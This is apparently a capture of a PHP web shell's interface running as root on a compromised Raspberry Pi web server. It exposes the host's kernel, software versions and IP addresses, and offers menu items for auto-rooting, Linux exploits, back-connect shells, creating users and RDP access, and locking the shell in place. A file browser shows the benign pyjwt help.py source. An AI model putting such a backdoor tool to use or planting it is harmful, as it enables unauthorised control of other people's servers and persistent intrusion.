Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python2.7 /
dist-packages /
jwt /
[ HOME SHELL ]
Name
Size
Permission
Action
contrib
[ DIR ]
drwxr-xr-x
__init__.py
810
B
-rw-r--r--
__init__.pyc
1.23
KB
-rw-r--r--
__main__.py
4.06
KB
-rw-r--r--
__main__.pyc
4.26
KB
-rw-r--r--
algorithms.py
13.02
KB
-rw-r--r--
algorithms.pyc
13.21
KB
-rw-r--r--
api_jws.py
7.91
KB
-rw-r--r--
api_jws.pyc
7.47
KB
-rw-r--r--
api_jwt.py
7.72
KB
-rw-r--r--
api_jwt.pyc
7.15
KB
-rw-r--r--
compat.py
1.59
KB
-rw-r--r--
compat.pyc
1.97
KB
-rw-r--r--
exceptions.py
986
B
-rw-r--r--
exceptions.pyc
2.88
KB
-rw-r--r--
help.py
1.57
KB
-rw-r--r--
help.pyc
1.74
KB
-rw-r--r--
utils.py
2.57
KB
-rw-r--r--
utils.pyc
3.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : help.py
from __future__ import print_function import json import platform import sys from . import __version__ as pyjwt_version try: import cryptography except ImportError: cryptography = None try: import ecdsa except ImportError: ecdsa = None def info(): """ Generate information for a bug report. Based on the requests package help utility module. """ try: platform_info = {"system": platform.system(), "release": platform.release()} except IOError: platform_info = {"system": "Unknown", "release": "Unknown"} implementation = platform.python_implementation() if implementation == "CPython": implementation_version = platform.python_version() elif implementation == "PyPy": implementation_version = "%s.%s.%s" % ( sys.pypy_version_info.major, sys.pypy_version_info.minor, sys.pypy_version_info.micro, ) if sys.pypy_version_info.releaselevel != "final": implementation_version = "".join( [implementation_version, sys.pypy_version_info.releaselevel] ) else: implementation_version = "Unknown" return { "platform": platform_info, "implementation": {"name": implementation, "version": implementation_version}, "cryptography": {"version": getattr(cryptography, "__version__", "")}, "pyjwt": {"version": pyjwt_version}, } def main(): """Pretty-print the bug information as JSON.""" print(json.dumps(info(), sort_keys=True, indent=2)) if __name__ == "__main__": main()
Close